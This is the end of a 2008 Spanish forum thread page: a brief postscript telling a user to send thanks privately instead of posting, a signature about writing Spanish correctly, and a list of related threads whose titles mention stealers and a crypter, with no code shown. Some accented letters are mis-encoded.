PD: 8789poli, si te gusta el cˇdigo se lo agradeces por privado la prˇxima vez, no vayas creando posts que no aportan nada y no vienen a cuento.

Venga, a cuidarse todos...
« Última modificación: 21 Noviembre 2008, 19:45 pm por corax » En línea

Nuestro idioma ha tardado 12 siglos en llegar hasta hoy dÝa. T˙ tan sˇlo tardas 20 segundos en escribir un post: no destroces en tan poco tiempo lo que tantos siglos ha costado crear.
Páginas: 1 [2] 3 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Problemas implementando un stealer...
Anßlisis y Dise˝o de Malware
Debci 9 4,109 Último mensaje 9 Abril 2013, 11:10 am
por Debci
[Delphi] DH ScreenShoter Stealer 0.2
Programaciˇn General
BigBear 0 1,261 Último mensaje 25 Noviembre 2013, 15:34 pm
por BigBear
[Delphi] DH WebCam Stealer 0.2
Programaciˇn General
BigBear 1 1,509 Último mensaje 29 Noviembre 2013, 15:39 pm
por daryo
Ayuda Cˇdigo CMD- USB Stealer
Scripting
shhadow9 5 2,463 Último mensaje 28 Junio 2014, 07:32 am
por Eleкtro
stealer web y crypter
Scripting
arthusu 0 605 Último mensaje 22 Junio 2018, 04:37 am
por arthusu
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines